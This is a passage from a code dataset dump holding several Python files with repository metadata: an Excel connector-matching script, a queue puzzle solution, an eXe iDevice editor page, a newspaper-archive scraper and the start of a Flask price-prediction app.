getsheet.cell(row=i+2, column=col_num).value.lstrip('H:') #原廠膠盒料號\n HF25 = getsheet.cell(row=i+2, column=col_maker).value #原廠膠盒廠商\n T13 = getsheet.cell(row=i+3, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n #如果T13不是以T:開頭,就再往下一行搜尋\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+3+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3+j, column=col_maker).value #原廠端子廠商\n j += 1\n \n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商} \n dit[L12]=[H13,HF25,T13,HT25]\n #如果原行數下一行的值非\"None\",比對其是否以H:開頭,如果是就加入list中\n theSameName(dit,L12, getsheet,i,4,col_num,col_maker)\n \n else: #如果H13不是None, 就不用往下偏移\n HF25 = getsheet.cell(row=i+1, column=col_maker).value # 原廠膠盒廠商\n T13 = getsheet.cell(row=i+2, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+2+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2+j, column=col_maker).value #原廠端子廠商\n j += 1 \n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商} \n dit[L12]= [H13.lstrip('H:'),HF25,T13,HT25]\n theSameName(dit, L12, getsheet, i, 2,col_num,col_maker)\n\n else: # 功能名稱已在CSCC字典中,改為添加值\n L12=getsheet.cell(row=i, column=col_function).value.upper().strip().replace('_',' ').replace('-',' ')\n H13 = getsheet.cell(row=i + 1, column=col_num).value # 原廠膠盒料號\n # 如果H13是空字符,那就將H13由原本指定的列數再往下一列,其餘元素跟著往下偏移\n if H13 is None:\n H13 = getsheet.cell(row=i + 2, column=col_num).value.lstrip('H:') #原廠膠盒料號\n HF25 = getsheet.cell(row=i + 2, column=col_maker).value #原廠膠盒廠商\n T13 = getsheet.cell(row=i+3, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n #如果T13不是以T:開頭,且不是None,就再往下一行搜尋\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+3+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+3+j, column=col_maker).value #原廠端子廠商\n j += 1\n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商}\n dit[L12].append(H13)\n dit[L12].append(HF25)\n dit[L12].append(T13)\n dit[L12].append(HT25)\n print(\"The connector %s append %s\" % (L12, (HF25+' '+H13))) \n # 如果原行數下一行的值非\"None\",比對其是否以H:開頭,如果是就加入list中\n theSameName(dit, L12, getsheet, i, 3,col_num,col_maker)\n\n\n else: # 如果H13不是None, 就不用往下偏移\n HF25 = getsheet.cell(row=i + 1, column=col_maker).value # 原廠膠盒廠商\n T13 = getsheet.cell(row=i+2, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2, column=col_maker).value #原廠端子廠商\n if T13 is None:\n pass\n else:\n j=1 #while迴圈迭代器\n #如果T13不是以T:開頭,且不是None,就再往下一行搜尋\n while T13 is not None:\n if T13.startswith(\"T:\"):\n break\n else:\n T13 = getsheet.cell(row=i+2+j, column=col_num).value #原廠端子料號\n HT25 = getsheet.cell(row=i+2+j, column=col_maker).value #原廠端子廠商\n j += 1 \n # cscc_conn_name[接頭名稱]={ 膠盒料號, 廠商, 端子料號,廠商}\n dit[L12].append(H13.lstrip('H:'))\n dit[L12].append(HF25)\n dit[L12].append(T13)\n dit[L12].append(HT25)\n print(\"The connector %s append %s\" % (L12, (HF25+' '+H13)))\n theSameName(dit, L12, getsheet, i, 2,col_num,col_maker)\n \n return dit\n\n#===========================以下為Connector比對專用函數=====================================\ndef cute(item):\n return item.upper().strip().replace('_', ' ').replace('-',' ')\n\ndef fuzzy(connector, dit, getsheet, i): #模糊比對\n global num\n print(\"[%s]The 
connector %s is in fuzzy mode\" % (i, connector))\n for csccname in dit:\n s1=set(connector.split())\n s2=set(csccname.split())\n #=========進入Find()比對模式========\n #主要解決HEAD_LAMP_RH與HEAD_LAMP會無法辨識的問題\n if len(connector) > len(csccname): #如果connector長度比cscc_name大,就以前者為基準\n\n if connector.find(csccname) >=0: #有比對出cscc_name字串出現在connector中\n print(\"[+]the connector is in (find) mode\")\n if len(dit[csccname]) >4:\n moreConnector(csccname, dit, getsheet,i)\n break\n else:\n print(\"[+]The connector in (find) is match %s\" % csccname)\n getsheet.cell(row=i, column=25).value=dit[csccname][1]\n getsheet.cell(row=i, column=26).value=dit[csccname][0].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[csccname][3]\n getsheet.cell(row=i, column=31).value=dit[csccname][2]\n if dit[csccname][1] != dit[csccname][3] and dit[csccname][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n \n elif csccname.find(connector) >=0:\n print(\"[+]the connector is in (find) mode\")\n if len(dit[csccname]) >4:\n moreConnector(csccname, dit, getsheet,i)\n break \n else:\n print(\"[+]The connector in (find) is match %s\" % csccname)\n getsheet.cell(row=i, column=25).value=dit[csccname][1]\n getsheet.cell(row=i, column=26).value=dit[csccname][0].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[csccname][3]\n getsheet.cell(row=i, column=31).value=dit[csccname][2]\n if dit[csccname][1] != dit[csccname][3] and dit[csccname][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n #==============進入set比對模式========== \n #此模式主要可對應RH_HEAD_Lamp與HEAD_LAMP_RH會無法辨識的問題\n #差異的部份小於三處,就視為相同,且忽略功能名稱字串小於兩個的項目 \n elif len(s1.symmetric_difference(s2)) <3 and len(s1)>2 and len(s2)>2 : \n print(\"[+]the connector is in (set) mode\")\n if len(dit[csccname]) > 4:\n moreConnector(csccname, dit, getsheet,i)\n break \n else: \n print(\"[+]The connectoe in (set) is find match %s\" % csccname)\n getsheet.cell(row=i, column=25).value=dit[csccname][1]\n getsheet.cell(row=i, column=26).value=dit[csccname][0].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[csccname][3]\n getsheet.cell(row=i, column=31).value=dit[csccname][2]\n if dit[csccname][1] != dit[csccname][3] and dit[csccname][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num +=1\n break\n \n \n else:\n getsheet.cell(row=i, column=26).value =\"Can't match\"\n \n\n \ndef moreConnector(connector, dit, getsheet, i):\n global num\n for j in range(0, len(dit[connector]),4):\n #如果cscc字典中有鍵的值與connector list的料號相同,就指定將該鍵的值填入connector list中\n if cute((dit[connector][j+1]+' '+dit[connector][j]))==cute(getsheet.cell(row=i, column=18).value):\n getsheet.cell(row=i, column=25).value=dit[connector][j+1]\n getsheet.cell(row=i, column=26).value=dit[connector][j].lstrip('H:')\n getsheet.cell(row=i, column=30).value=dit[connector][j+3]\n getsheet.cell(row=i, column=31).value=dit[connector][j+2]\n print(\"[%s]find connector %s match cscc,and is %s\" % (i,connector,(dit[connector][j+1]+' '+dit[connector][j])) )\n if dit[connector][j+1] != dit[connector][j+3] and dit[connector][j+3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n #否則就比對connector_list的接頭孔數(column=16(P))是否與cscc中的日產編號型式相同,是的話填入connector_list中(意指廠商使用LOCAL件)\n elif int(getsheet.cell(row=i, column=16).value) == int(re.findall(r'\\w*(\\d\\d)\\D*',dit[connector][j])[0]):\n getsheet.cell(row=i, column=25).value=dit[connector][j+1]\n getsheet.cell(row=i, column=26).value=dit[connector][j].lstrip('H:')\n 
getsheet.cell(row=i, column=30).value=dit[connector][j+3]\n getsheet.cell(row=i, column=31).value=dit[connector][j+2]\n print(u\"[%s]find connector %s match 日產編號 cscc,and is %s\" % (i,connector,(dit[connector][j+1]+' '+dit[connector][j])))\n if dit[connector][j+1] != dit[connector][j+3] and dit[connector][j+3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1\n break\n else:\n pass\n\n\n\n#================載入樂榮CSCC ============\nData_local=\"c:\\\\Python34\\\\DATA\\\\\"\nCSCC_Name=['24010-KN711-CSCC-D.xlsx', '24012-KN711-CSCC-161214.xlsx',\n '24068-KN711-CSCC-161214.xlsx','24023-KN711-CSCC-170307.xlsx']\nprint(\"創建Excel物件....CSCC\")\ncscc_conn={}\nfor CsccName in CSCC_Name:\n print(\"載入 %s\" % (Data_local+CsccName))\n wb, sheetname=loadExcel(Data_local+CsccName)\n for shet in sheetname:\n getsheet=wb.get_sheet_by_name(shet)\n for i in range(25, int(getsheet.max_row)+1):\n cscc_conn=cscc(cscc_conn, i, getsheet,12,13,25)\n\n#================載入矢崎CSCC==============\nCsccName1='24011-KN711-CSCC-161104.xlsx'\nprint(\"載入 %s ...\" % (Data_local+CsccName1))\nwb3,sheetname3=loadExcel(Data_local+CsccName1)\ngetsheet3=wb3.get_sheet_by_name(sheetname3[0])\nfor i in range(25, int(getsheet3.max_row)+1):\n cscc_conn=cscc(cscc_conn,i,getsheet3,14,15,27)\n\n#===============比對Connector List與cscc內容=======\nconnector_list='GPKMC_Connector list_R-2_NEW2.xlsx'\nprint(\"載入 %s\" % (Data_local+connector_list))\nwb2,sheet2=loadExcel(Data_local+connector_list)\ngetcbsheet=wb2.get_sheet_by_name(sheet2[0])\nfor i in range(4, int(getcbsheet.max_row)+1):\n if getcbsheet.cell(row=i, column=10).value is None: #如果功能名稱是None,就跳過\n pass\n else:\n JS10=cute(getcbsheet.cell(row=i, column=10).value)\n # 如果 connector list的功能名稱有出現在cscc字典中\n if JS10 in cscc_conn:\n if len(cscc_conn[JS10]) > 4: #如果len >4 代表有複數顆接頭\n moreConnector(JS10, cscc_conn, getcbsheet,i)\n else: #len沒有大於3,代表接頭與料號為一對一的關係\n getcbsheet.cell(row=i, column=25).value=cscc_conn[JS10][1]\n getcbsheet.cell(row=i, column=26).value=cscc_conn[JS10][0].lstrip('H:')\n getcbsheet.cell(row=i, column=30).value=cscc_conn[JS10][3]\n getcbsheet.cell(row=i, column=31).value=cscc_conn[JS10][2]\n print(\"[%s]find connector %s match cscc\" % (i,JS10))\n if cscc_conn[JS10][1] != cscc_conn[JS10][3] and cscc_conn[JS10][3] is not None:\n getcbsheet.cell(row=i, column=30).fill=Color_red\n num += 1 \n\n else: #如果功能名稱不在cscc中,就進入模糊比對\n fuzzy(JS10,cscc_conn,getcbsheet,i)\n\nprint(\"\\n\")\nprint(str(datetime.now()))\nprint(\"Match %s items\" % num)\n\nprint(\"Save File...\")\nwb2.save(Data_local+'GPKMC_Connector list_test7T.xlsx')\nprint(\"Done\")\n", "repo_name": "cololk/python", "sub_path": "cscc_to_connector_4.2.1T.py", "file_name": "cscc_to_connector_4.2.1T.py", "file_ext": "py", "file_size_in_byte": 17491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openpyxl.styles.PatternFill", "line_number": 16, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 247, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 312, "usage_type": "name"}]} +{"seq_id": "36377740528", "text": "from collections import deque\nN = int(input())\narr = list(map(int, input().split()))\nballoons = [i for i in range(1, N + 1)]\n\nque = deque()\nque.append((arr[0], 1))\n\nanswer = []\ncurr = 0\n\nwhile arr:\n # 
print(\"curr: \", curr)\n balloon = balloons.pop(curr)\n num = arr.pop(curr)\n answer.append(balloon)\n\n # print(\"after\")\n # print(arr)\n # print(balloons)\n\n length = 0\n if len(arr) == 0:\n length = 1\n else:\n length = len(arr)\n\n if num < 0:\n next = (length + curr + num) % length\n else:\n next = (curr + num - 1) % length\n\n # print(\"next: \", next)\n curr = next\n # print()\n # print(answer)\n # print()\n\nprint(*answer)\n\n''' deque, enumerate 사용\nfrom collections import deque\nn = int(input())\nq = deque(enumerate(map(int,input().split())))\nans=[]\n\nwhile q:\n idx,num = q.popleft()\n ans.append(idx+1)\n if num>0:\n q.rotate(-(num-1))\n elif num<0:\n q.rotate(-num)\n\nprint(' '.join(map(str,ans)))\n'''\n'''\n5\n-1 -1 -1 -1 -1\n\ncurr : 0\n[3, 2, 1, -3, -1]\n[1, 2, 3, 4, 5]\n(3, 1)\nnext: 3\nanswer: [1]\n\ncurr: 3\n[2, 1, -3, -1]\n[2, 3, 4, 5]\n(-3, 4)\nnext: (3-3)-1\n\n(-3, 4) \ncurr: 2 -3 = -1 => len(arr)-1=2\n[2, 1, -1]\n[2, 4, 5]\n\n(-1, 5)\ncurr: -1\n[2, 1]\n[2, 4]\n=> curr:(2-1) % len(arr)\n\n(2, 2)\n[1]\n[4]\ncurr: (2 + 2) % len(arr)\n\n'''", "repo_name": "studying-ice-bear/pparkkkimeom", "sub_path": "GimYujin/DataStruture_Queue/2346_풍선_터뜨리기.py", "file_name": "2346_풍선_터뜨리기.py", "file_ext": "py", "file_size_in_byte": 1307, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "1777774109", "text": "import logging\nfrom twisted.web.resource import Resource\nfrom exe.webui import common\nfrom exe.engine.genericidevice import GenericIdevice\nfrom exe.webui.editorpane import EditorPane\nfrom exe.webui.renderable import RenderableResource\nfrom exe.engine.package import Package\nfrom exe.engine.path import Path\nfrom exe.engine.field import MultimediaField\nfrom cgi import escape\n\nlog = logging.getLogger(__name__)\n\n\nclass EditorPage(RenderableResource):\n \"\"\"\n The EditorPage is responsible for managing user created iDevices\n create / edit / delete\n \"\"\"\n\n name = 'editor'\n\n def __init__(self, parent):\n \"\"\"\n Initialize\n \"\"\"\n RenderableResource.__init__(self, parent)\n self.editorPane = EditorPane(self.webServer, self)\n self.url = \"\"\n self.elements = []\n self.isNewIdevice = True\n #JR: Anado esta variable para que los genericos no se puedan previsualizar\n self.isGeneric = False\n self.message = \"\"\n \n def getChild(self, name, request):\n \"\"\"\n Try and find the child for the name given\n \"\"\"\n if name == \"\":\n return self\n else:\n return Resource.getChild(self, name, request)\n\n\n def process(self, request):\n \"\"\"\n Process current package \n \"\"\"\n log.debug(\"process \" + repr(request.args))\n \n self.editorPane.process(request,\"old\")\n\n if \"action\" in request.args:\n if request.args[\"action\"][0] == \"changeIdevice\":\n genericIdevices = self.ideviceStore.generic\n if not self.isNewIdevice:\n ideviceId = self.editorPane.idevice.id\n for idevice in genericIdevices:\n if idevice.id == ideviceId:\n break\n copyIdevice = self.editorPane.idevice.clone()\n self.__saveChanges(idevice, copyIdevice)\n \n selected_idevice = request.args[\"object\"][0].decode(\"utf-8\")\n\n self.isGeneric = False\n for idevice in genericIdevices:\n if idevice.title == selected_idevice:\n self.isGeneric = True\n break\n self.isNewIdevice = False\n self.editorPane.setIdevice(idevice) \n self.editorPane.process(request, \"new\")\n \n \n if ((\"action\" in request.args and \n 
request.args[\"action\"][0] == \"newIdevice\")\n or \"new\" in request.args):\n self.__createNewIdevice(request)\n \n\n if (\"action\" in request.args and request.args[\"action\"][0] == \"deleteIdevice\"):\n self.ideviceStore.delIdevice(self.editorPane.idevice)\n #Lo borramos tambien de la lista factoryiDevices\n idevice = self.editorPane.idevice\n exist = False\n for i in self.ideviceStore.getFactoryIdevices():\n if i.title == idevice.title:\n idevice.id = i.id\n exist = True\n break\n if exist:\n self.ideviceStore.factoryiDevices.remove(idevice)\n self.ideviceStore.save()\n self.message = _(\"Done\")\n self.__createNewIdevice(request) \n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"new\"):\n if self.editorPane.idevice.title == \"\":\n self.message = _(\"Please enter an idevice name.\")\n else:\n newIdevice = self.editorPane.idevice.clone()\n #TODO could IdeviceStore set the id in addIdevice???\n newIdevice.id = self.ideviceStore.getNewIdeviceId()\n self.ideviceStore.addIdevice(newIdevice)\n self.editorPane.setIdevice(newIdevice)\n self.ideviceStore.save()\n self.message = _(\"Settings Saved\")\n self.isNewIdevice = False\n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"save\"): \n genericIdevices = self.ideviceStore.generic\n for idevice in genericIdevices:\n if idevice.title == self.editorPane.idevice.title:\n break\n copyIdevice = self.editorPane.idevice.clone()\n self.__saveChanges(idevice, copyIdevice)\n self.ideviceStore.save()\n self.message = _(\"Settings Saved\")\n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"export\"): \n filename = request.args[\"pathpackage\"][0]\n self.__exportIdevice(filename)\n \n if (\"action\" in request.args and \n request.args[\"action\"][0] == \"import\"):\n filename = request.args[\"pathpackage\"][0]\n self.__importIdevice(filename)\n\n \n def __createNewIdevice(self, request):\n \"\"\"\n Create a new idevice and add to idevicestore\n \"\"\"\n idevice = GenericIdevice(\"\", \"\", \"\", \"\", \"\")\n idevice.icon = \"\"\n idevice.id = self.ideviceStore.getNewIdeviceId()\n self.editorPane.setIdevice(idevice)\n self.editorPane.process(request, \"new\") \n self.isNewIdevice = True\n \n def __saveChanges(self, idevice, copyIdevice):\n \"\"\"\n Save changes to generic idevice list.\n \"\"\"\n idevice.title = copyIdevice._title\n idevice.author = copyIdevice._author\n idevice.purpose = copyIdevice._purpose\n idevice.tip = copyIdevice._tip\n idevice.fields = copyIdevice.fields\n idevice.emphasis = copyIdevice.emphasis\n idevice.icon = copyIdevice.icon\n idevice.systemResources = copyIdevice.systemResources \n \n def __importIdevice(self, filename):\n \n \"\"\"\n import the idevices which are not existed in current package from another package\n \"\"\"\n try: \n newPackage = Package.load(filename)\n except:\n self.message = _(\"Sorry, wrong file format.\")\n return\n \n if newPackage: \n newIdevice = newPackage.idevices[-1].clone()\n for currentIdevice in self.ideviceStore.generic:\n if newIdevice.title == currentIdevice.title:\n newIdevice.title += \"1\"\n break\n self.ideviceStore.addIdevice(newIdevice) \n self.ideviceStore.save()\n else:\n self.message = _(\"Sorry, wrong file format.\")\n \n def __exportIdevice(self, filename):\n \"\"\"\n export the current generic idevices.\n \"\"\"\n if not filename.endswith('.idp'):\n filename = filename + '.idp'\n name = Path(filename).namebase\n package = Package(name)\n package.idevices.append(self.editorPane.idevice.clone())\n 
package.save(filename)\n \n \n def render_GET(self, request):\n \"\"\"Called for all requests to this object\"\"\"\n \n # Processing \n log.debug(\"render_GET\")\n self.process(request)\n \n # Rendering\n html = common.docType()\n html += \"\\n\"\n html += \"\\n\"\n html += \"\\n\"\n html += '\\n'\n html += '\\n'\n html += '\\n'\n html += \"\"+_(\"eXe : elearning XHTML editor\")+\"\\n\"\n html += \"\\n\";\n html += \"\\n\"\n html += \"\\n\"\n html += \" \\n\" \n html += \"\" \n html += common.hiddenField(\"action\")\n html += common.hiddenField(\"object\")\n html += common.hiddenField(\"isChanged\", \"1\") \n if self.message != '':\n html += \"\"\n html += \" \\n\" \n html += self.renderList()\n html += self.editorPane.renderButtons(request)\n if self.isNewIdevice:\n html += \"\" + common.submitButton(\"delete\", _(\"Delete\"), \n False)\n else:\n html += ''\n html += '' % (escape(title), _(\"Save\"))\n html += u'' % _(\"Import iDevice\")\n html += u'' % _(\"Export iDevice\")\n html += u'\\n' % _(\"Quit\")\n html += common.hiddenField(\"pathpackage\")\n html += \"\"\n html += \"\\n\"\n html += self.editorPane.renderIdevice(request)\n html += \"\\n\"\n html += \"\\n\"\n html += \"\\n\"\n html += \"\\n\"\n return html.encode('utf8')\n render_POST = render_GET\n\n\n def renderList(self):\n \"\"\"\n Render the list of generic iDevice\n \"\"\"\n html = \"\" + _(\"Edit\")+ \"\"\n html += '\\n'\n html += \"\"+ _(\"New iDevice\") + \"\"\n for prototype in self.ideviceStore.generic:\n html += \" 16:\n title = title[:16] + \"...\"\n html += \">\" + title + \"\\n\"\n\n html += \" \\n\"\n html += \"\\n\"\n self.message = \"\"\n return html\n", "repo_name": "exelearning/iteexe", "sub_path": "exe/webui/editorpage.py", "file_name": "editorpage.py", "file_ext": "py", "file_size_in_byte": 11331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 116, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "exe.webui.renderable.RenderableResource", "line_number": 15, "usage_type": "name"}, {"api_name": "exe.webui.renderable.RenderableResource.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "exe.webui.renderable.RenderableResource", "line_number": 27, "usage_type": "name"}, {"api_name": "exe.webui.editorpane.EditorPane", "line_number": 28, "usage_type": "call"}, {"api_name": "twisted.web.resource.Resource.getChild", "line_number": 43, "usage_type": "call"}, {"api_name": "twisted.web.resource.Resource", "line_number": 43, "usage_type": "name"}, {"api_name": "exe.engine.genericidevice.GenericIdevice", "line_number": 139, "usage_type": "call"}, {"api_name": "exe.engine.package.Package.load", "line_number": 165, "usage_type": "call"}, {"api_name": "exe.engine.package.Package", "line_number": 165, "usage_type": "name"}, {"api_name": "exe.engine.path.Path", "line_number": 187, "usage_type": "call"}, {"api_name": "exe.engine.package.Package", "line_number": 188, "usage_type": "call"}, {"api_name": "exe.webui.common.docType", "line_number": 201, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 201, "usage_type": "name"}, {"api_name": "exe.webui.common.hiddenField", "line_number": 222, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 222, "usage_type": "name"}, {"api_name": "exe.webui.common.hiddenField", "line_number": 223, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 223, "usage_type": "name"}, {"api_name": 
"exe.webui.common.hiddenField", "line_number": 224, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 224, "usage_type": "name"}, {"api_name": "exe.webui.common.submitButton", "line_number": 231, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 231, "usage_type": "name"}, {"api_name": "cgi.escape", "line_number": 240, "usage_type": "call"}, {"api_name": "exe.webui.common.hiddenField", "line_number": 250, "usage_type": "call"}, {"api_name": "exe.webui.common", "line_number": 250, "usage_type": "name"}]} +{"seq_id": "19071057804", "text": "import csv\nimport os\nimport random\nimport time\nimport urllib.request\nimport glob\nfrom digi_selenium_scraper_common_functions import (\n convert_day_or_month_to_str)\nimport http\n\n\ndef read_csv_to_dictlist(csv_filename, browser):\n with open(csv_filename) as csvfile:\n papers_list = []\n csvreader = csv.reader(csvfile)\n for i in range(2):\n next(csvreader)\n for row in csvreader:\n url = row[6]\n url_common_prefix = url.split('?page=1')[0] + '/'\n binding_no = url_common_prefix.split('/')[5]\n browser.get(url)\n print('processing row with url: ' + url)\n last_page = browser.find_element_by_css_selector(\n 'div.page-navigation span.ng-binding').text\n last_page = last_page[1:]\n row_dict = {'binding_no': binding_no,\n 'title': row[0],\n 'issn': row[1],\n 'url': url,\n 'url_common_prefix': url_common_prefix,\n 'last_page': last_page}\n papers_list.append(row_dict)\n # print('processed row with url: ' + url)\n return(papers_list)\n\n\ndef write_refined_csv(day_dir, day_list, material_type):\n y_str = day_dir.split('/')[2]\n m_str = day_dir.split('/')[3]\n d_str = day_dir.split('/')[4]\n new_csv_filename = (day_dir + 'refined_' +\n material_type + '-' +\n y_str + '-' +\n m_str + '-' +\n d_str + '.csv')\n\n with open(new_csv_filename, 'w') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(['binding_no',\n 'title',\n 'issn',\n 'url',\n 'url_common_prefix',\n 'last_page'])\n for item in day_list:\n csvwriter.writerow([item.get('binding_no'),\n item.get('title'),\n item.get('issn'),\n item.get('url'),\n item.get('url_common_prefix'),\n item.get('last_page')])\n\n print(\"Wrote refined csv-file for data: \" +\n y_str + \"/\" + m_str + \"/\" + d_str + \" - \" + material_type)\n\n\ndef download_items_from_day_list(day_list, day_dir, material_type,\n scrape_images=False):\n y_str = day_dir.split('/')[2]\n m_str = day_dir.split('/')[3]\n d_str = day_dir.split('/')[4]\n for item in day_list:\n url_common_prefix = item.get('url_common_prefix')\n item_dir = day_dir + item.get('binding_no')\n last_page = item.get('last_page')\n\n if not os.path.exists(item_dir):\n os.makedirs(item_dir)\n\n page_list = list(range(1, int(last_page) + 1))\n\n print(\"Getting content for binding: \" + item.get('binding_no') +\n \" - \" + y_str + \"/\" + m_str + \"/\" + d_str + \"-\" +\n material_type + \" - pages: \" + last_page)\n\n for page_number in page_list:\n page_str = str(page_number)\n text_url = url_common_prefix + \"page-\" + page_str + \".txt\"\n text_filename = item_dir + '/' + \"page-\" + page_str + \".txt\"\n alto_url = url_common_prefix + \"page-\" + page_str + \".xml\"\n alto_filename = item_dir + '/' + \"page-\" + page_str + \".xml\"\n image_url = url_common_prefix + \"image/\" + page_str\n image_filename = item_dir + '/' + \"page-\" + page_str + \".jpg\"\n\n seconds = random.random() * 0.3 + 0.5\n time.sleep(seconds)\n\n for attempt in range(1, 11):\n try:\n urllib.request.urlretrieve(text_url,\n 
filename=text_filename)\n time.sleep(0.1)\n urllib.request.urlretrieve(alto_url,\n filename=alto_filename)\n if scrape_images:\n urllib.request.urlretrieve(image_url,\n filename=image_filename)\n break\n except http.client.HTTPException as e:\n print(e)\n print(str(attempt) + \"/10 Retrying in 2 seconds.\")\n time.sleep(2)\n continue\n break\n\n\ndef download_material_for_day(year, month, day, material_type, browser):\n\n day_dir = ('output/scrape_results/' +\n str(year) + '/' +\n convert_day_or_month_to_str(month) + '/' +\n convert_day_or_month_to_str(day) + '/')\n csv_filename = (day_dir +\n material_type + '-' +\n str(year) + '-' +\n convert_day_or_month_to_str(month) + '-' +\n convert_day_or_month_to_str(day) + '.csv')\n\n if not glob.glob(csv_filename):\n print(\" ---- no papers to scrape for: \" + day_dir)\n else:\n day_list = read_csv_to_dictlist(csv_filename, browser)\n write_refined_csv(day_dir, day_list, material_type)\n download_items_from_day_list(day_list, day_dir, material_type)\n", "repo_name": "villevaara/digi-scraper", "sub_path": "digi-sele/digi_selenium_scraper_daily_functions.py", "file_name": "digi_selenium_scraper_daily_functions.py", "file_ext": "py", "file_size_in_byte": 5293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.reader", "line_number": 15, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "random.random", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 97, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 101, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 101, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 103, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 104, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 104, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 104, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 107, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 107, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 107, "usage_type": "name"}, {"api_name": "http.client", "line_number": 110, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 113, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 122, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 123, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 127, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 128, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "13775152719", "text": "# flask.py\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\nfrom 
flask import url_for\nimport numpy as np\nfrom numpy import loadtxt\nfrom keras.models import load_model\nimport pandas as pd\nfrom pandas import read_csv\nimport datetime\n\napp = Flask(__name__)\n\n# load model\nmodel = load_model('Queens_apartment.h5')\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/', methods=['POST']) # https://github.com/nitinkaushik01/Deploy_Machine_Learning_Model_on_Flask_App/blob/master/Flask_Sample_App/app.py\ndef predict():\n # grabs the input data when a post request is sent\n ResU= int(request.form['Residential_Units'])\n ComU= int(request.form['Commercial_Units'])\n Gsqft= float(request.form['Gross_sqft'])\n Zip= str(request.form['Zip_Code'])\n Class_C= str(request.form['Class_Category'])\n Year= (request.form['Year_Built'])\n\n #convert year to the str category that the model will understand\n Year = int(Year)\n if Year < 3:\n Year ='AGE OF BUILDING_1'\n elif Year < 10:\n Year = 'AGE OF BUILDING_2'\n elif Year < 20:\n Year = 'AGE OF BUILDING_3'\n elif Year < 30:\n Year = 'AGE OF BUILDING_4'\n elif Year < 50:\n Year = 'AGE OF BUILDING_5'\n elif Year < 75:\n Year = 'AGE OF BUILDING_6'\n elif Year < 100:\n Year = 'AGE OF BUILDING_7'\n elif Year < 